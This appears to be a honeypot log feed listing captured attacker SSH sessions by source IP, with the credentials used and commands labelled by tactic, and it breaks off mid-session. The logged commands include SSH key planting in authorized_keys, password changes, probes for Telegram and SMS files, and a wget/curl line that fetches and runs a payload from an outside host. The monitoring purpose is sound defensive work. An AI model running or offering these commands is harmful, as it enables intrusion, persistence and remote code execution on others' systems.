$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 pretzel_root_11 (130.12.181.99) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-03-28 15:59 EDT · as postgres/postgres

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 strudel_root_10 (130.12.181.98) — Frankfurt am Main, Germany · 1 session · 1 cmd

2026-03-28 15:13 EDT · as test/123456

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ cat /proc/cpuinfo|grep name|cut -f2 -d':'|uniq -c ; uname -a

↳ CPU profiling

🎭 autobahn_root_3 (45.82.123.99) — Frankfurt am Main, Germany · 11 sessions · 11 cmds

2026-03-26 12:02 EDT · as root/1234, root/123456, root/12345678

successful root login with weak credentials → immediate environment reconnaissance (env, hostname, uname) → hardware profiling via /proc/cpuinfo → uptime and whoami verification → execution of wget payload → chmod +x → binary execution → attempted persistence via crontab

$ uptime ×2

↳ uptime check

$ whoami ×3

↳ privilege check

$ ssh -V

$ env | head -10

$ hostname

↳ hostname discovery

$ pwd

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo | grep 'model name' | head -1

↳ CPU profiling

🎭 burger_root_10 (5.161.233.230) — Ashburn, United States · 3 sessions · 3 cmds

2026-03-28 03:35 EDT · as root/1234, root/123456, root/12345678

history snooping → privilege check → OS/kernel identification

$ history | tail -5

↳ history snooping

$ whoami

↳ privilege check

$ uname -a

↳ OS/kernel identification

🎭 capoeira_root_8 (177.36.214.46) — Pirapora, Brazil · 1 session · 19 cmds

2026-03-27 19:52 EDT · as root/toor

file attribute tampering → SSH key persistence → CPU profiling → execute from /tmp → persistence setup

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:1EqTznkWEgPI"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 burger_root (20.49.0.100) — Boydton, United States · 1 session · 19 cmds

2026-03-27 19:49 EDT · as root/toor

chattr -ia .ssh → rm -rf .ssh → mkdir .ssh → echo "ssh-rsa" → cat /proc/cpuinfo | grep name → echo "root:fjC0NPHKwbhz"|chpasswd → pkill -9 secure.sh → echo > /etc/hosts → cat /proc/cpuinfo | grep model → free -m | grep Mem → ls

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo "root:fjC0NPHKwbhz"|chpasswd|bash

$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;

↳ execute from /tmp

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 rogue_root_42 (207.46.224.91) — Singapore, Singapore · 3 sessions · 3 cmds

2026-03-27 08:31 EDT · as root/1234, root/123456, root/12345678

history snooping → env → ls

$ history | tail -5

↳ history snooping

$ env | head -10

$ ls -la /

🎭 autobahn_root_8 (213.165.52.102) — Frankfurt am Main, Germany · 3 sessions · 3 cmds

2026-03-26 07:03 EDT · as root/123456

mount → env → pwd

$ mount | head -5

$ env | head -10

$ pwd

🎭 jade_root_16 (150.138.182.190) — Jinan, China · 1 session · 1 cmd

2026-03-27 09:13 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 autobahn_root_14 (64.188.119.209) — Frankfurt am Main, Germany · 10 sessions · 40 cmds

2026-03-26 14:27 EDT · as admin/123456, admin/admin123, admin/password

export → uname → cat (repeated export 3x)

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ×10

$ uname -s -v -n -m 2 > /dev/null ×10

$ uname -m 2 > /dev/null ×10

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ×10

🎭 cipher_root_2 (66.181.171.136) — Ulan Bator, Mongolia · 48 sessions · 48 cmds

2026-03-24 09:38 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 2x across 2 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×48

🎭 cipher_root_68 (103.61.122.229) — Thanh Liệt, Vietnam · 3 sessions · 3 cmds

2026-03-03 07:06 EST · as root/1234, root/admin, root/qwerty

history snooping → hostname discovery

$ hostname ×2

↳ hostname discovery

$ history | tail -5

↳ history snooping

🎭 rogue_root_43 (144.124.196.105) — Tashkent, Uzbekistan · 1 session · 1 cmd

2026-03-26 08:42 EDT · as root/root

CPU architecture scan

$ lscpu

↳ CPU architecture scan

🎭 kimchi_root_7 (211.185.125.204) — Wŏnju, South Korea · 1 session · 9 cmds

2026-03-26 05:02 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 star_root_14 (85.239.151.41) — New York, United States · 1 session · 7 cmds

2026-03-26 04:29 EDT · as admin/admin

enable → system → shell → sh → linuxshell → cd /tmp/; echo "senpai" > rootsenpai; cat rootsenpai; rm -rf rootsenpai → rm -rf shr; wget http://202.155.10.112/shr || curl -O http://202.155.10.1

$ enable

$ system

$ shell

$ sh

$ linuxshell

$ cd /tmp/; echo "senpai" > rootsenpai; cat rootsenpai; rm -rf rootsenpai

$ rm -rf shr; wget http://202.155.10.112/shr || curl -O http://202.155.10.112/shr || tftp 202.155.10.112 -c get shr || tftp -g -r shr 202.155.10.112; chmod 777 shr;./shr ssh; rm -rf shr

↳ payload download from C2

🎭 abba_root (94.254.3.142) — Stockholm, Sweden · 1 session · 9 cmds

2026-03-26 02:33 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 shadow_root_46 (38.250.116.128) — Ica, Peru · 1 session · 4 cmds

2026-03-25 20:46 EDT · as pi/raspberry

export → uname → cat

$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output"

$ uname -s -v -n -m 2 > /dev/null

$ uname -m 2 > /dev/null

$ cat /proc/uptime 2 > /dev/null | cut -d. -f1

🎭 cipher_root_69 (45.78.198.228) — Singapore, Singapore · 1 session · 11 cmds

2026-03-25 15:35 EDT · as user/user

chattr -ia .ssh → rm -rf .ssh → mkdir .ssh → echo RSA key → passwd -P user → cat /proc/cpuinfo | grep name | wc -l → cat /proc/cpuinfo | awk hardware profiling → free -m | awk memory audit → ls -lh $(which ls) → which ls → crontab -l

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "user\nul0tIzCNbZv3\nul0tIzCNbZv3"|passwd|bash

$ Enter new UNIX password:

$ echo "user\nul0tIzCNbZv3\nul0tIzCNbZv3\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

🎭 monsoon_root_6 (61.2.141.217) — Kochi, India · 1 session · 20 cmds

2026-03-25 15:28 EDT · as user/user

cd ~ && rm -rf .ssh && mkdir .ssh → echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv" → echo "user\nk8I4H0hSyNyZ\nk8I4H0hSyNyZ"|passwd

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "user\nk8I4H0hSyNyZ\nk8I4H0hSyNyZ"|passwd|bash

$ Enter new UNIX password:

$ echo "user\nk8I4H0hSyNyZ\nk8I4H0hSyNyZ\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 yankee_root_16 (146.190.79.63) — North Bergen, United States · 1 session · 20 cmds

2026-03-25 15:18 EDT · as user/user

cd ~; chattr -ia .ssh; lockr -ia .ssh → cd ~ && rm -rf .ssh && mkdir .ssh → echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7Vv" → cat /proc/cpuinfo | grep name | wc

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "user\nbyF10adwH3Xo\nbyF10adwH3Xo"|passwd|bash

$ Enter new UNIX password:

$ echo "user\nbyF10adwH3Xo\nbyF10adwH3Xo\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 rogue_root_44 (14.225.3.79) — Hanoi, Vietnam · 1 session · 20 cmds

2026-03-25 15:15 EDT · as user/user

file attribute tampering → SSH key persistence → CPU profiling

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

$ cat /proc/cpuinfo | grep name | wc -l

↳ CPU profiling

$ echo -e "user\n3ledwUSVdDaN\n3ledwUSVdDaN"|passwd|bash

$ Enter new UNIX password:

$ echo "user\n3ledwUSVdDaN\n3ledwUSVdDaN\n"|passwd

$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'

↳ CPU profiling

$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'

$ ls -lh $(which ls)

$ which ls

$ crontab -l

↳ persistence setup

$ w

↳ logged-in users check

$ uname -m

$ cat /proc/cpuinfo | grep model | grep name | wc -l

↳ CPU profiling

$ top

↳ process monitoring

$ uname

↳ OS identification

$ uname -a

↳ OS/kernel identification

$ whoami

↳ privilege check

$ lscpu | grep Model

$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'

🎭 wraith_root_46 (23.97.62.120) — Singapore, Singapore · 3 sessions · 3 cmds

2026-03-25 08:14 EDT · as root/1234

hostname discovery → privilege check

$ hostname

↳ hostname discovery

$ whoami ×2

↳ privilege check

🎭 fjord_root_4 (78.82.135.89) — Norsborg, Sweden · 1 session · 9 cmds

2026-03-25 07:54 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

↳ CPU profiling

$ ps | grep '[Mm]iner'

$ ps -ef | grep '[Mm]iner'

$ ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

$ locate D877F783D5D3EF8Cs

$ echo Hi | cat -n

🎭 phantom_root_42 (41.212.152.205) — Port Louis, Mauritius · 1 session · 1 cmd

2026-03-25 06:27 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 tiger_db (52.172.177.191) — Pune, India · 1 session · 2 cmds

2026-03-25 01:54 EDT · as oracle/password

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 burger_db_2 (50.84.211.204) — Austin, United States · 1 session · 2 cmds

2026-03-25 01:41 EDT · as oracle/password

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 rogue_db (186.80.18.158) — Medellín, Colombia · 1 session · 2 cmds

2026-03-25 01:33 EDT · as oracle/password

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 specter_sol_3 (60.244.155.70) — Taichung, Taiwan · 1 session · 2 cmds

2026-03-24 23:17 EDT · as oracle/12345

file attribute tampering → SSH key persistence

$ cd ~; chattr -ia .ssh; lockr -ia .ssh

↳ file attribute tampering

$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~

↳ SSH key persistence

🎭 crepe_root (87.106.53.167) — Courbevoie, France · 35 sessions · 35 cmds

2026-03-24 16:50 EDT · as admin/123456, admin/admin, admin/admin123

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -v -n -r -m ×35

🎭 bistro_root (217.76.49.154) — Lauterbourg, France · 1 session · 3 cmds

2026-03-24 18:00 EDT · as guest/guest

make executable (world) → uname → core count check

$ arch_info=$(uname -m); cpu_count=$(nproc); echo -e "guest\n9iIeGFXX\n9iIeGFXX" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPkcUOA/x/v3jySnP6HCyjn6QzKILlMl8zB3RKHiw0f14sRESr4SbI/Dp2SokPZxNBJwwa4MUa/hx5bTE/UqNU2+b6b+W+zR9YRl610TFE/mUaFiXgtnmQsrGG6zflB5JjxzWaHl3RRpHhaOe5GdPzf1OhXJv4mCt2VKwcLWIyRQxN3fsrrlCF2Sr3c0SjaYmhAnXtqmednQE+rw== server" > ${HOME}/.ssh/authorized_keys; chmod 600 ${HOME}/.ssh/authorized_keys >/dev/null 2>&1; chmod 700 ${HOME}/.ssh >/dev/null 2>&1; echo "$arch_info:$cpu_count"

↳ make executable (world)

$ uname -m

$ nproc

↳ core count check

🎭 panda_root_20 (8.138.207.213) — Guangzhou, China · 1 session · 1 cmd

2026-03-24 17:29 EDT · as admin/admin

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -a

↳ OS/kernel identification

🎭 pretzel_root_12 (116.203.194.55) — Nuremberg, Germany · 3 sessions · 3 cmds

2026-03-24 14:26 EDT · as root/1234, root/123456, root/12345678

history snooping → netstat → OS/kernel identification

$ history | tail -5

↳ history snooping

$ netstat -tulpn | head -10

$ uname -a

↳ OS/kernel identification

🎭 dragon_root_19 (180.101.149.231) — Nanjing, China · 1 session · 1 cmd

2026-03-24 11:35 EDT · as root/root

Ran uname 1x across 1 sessions — automated OS fingerprinting.

$ uname -s -m

🎭 meatball_root_2 (85.24.209.239) — Tumba, Sweden · 1 session · 9 cmds

2026-03-24 08:42 EDT · as root/root

network mapping → OS/kernel identification → CPU profiling

$ /ip cloud print

$ ifconfig

↳ network mapping

$ uname -a

↳ OS/kernel identification

$ cat /proc/cpuinfo

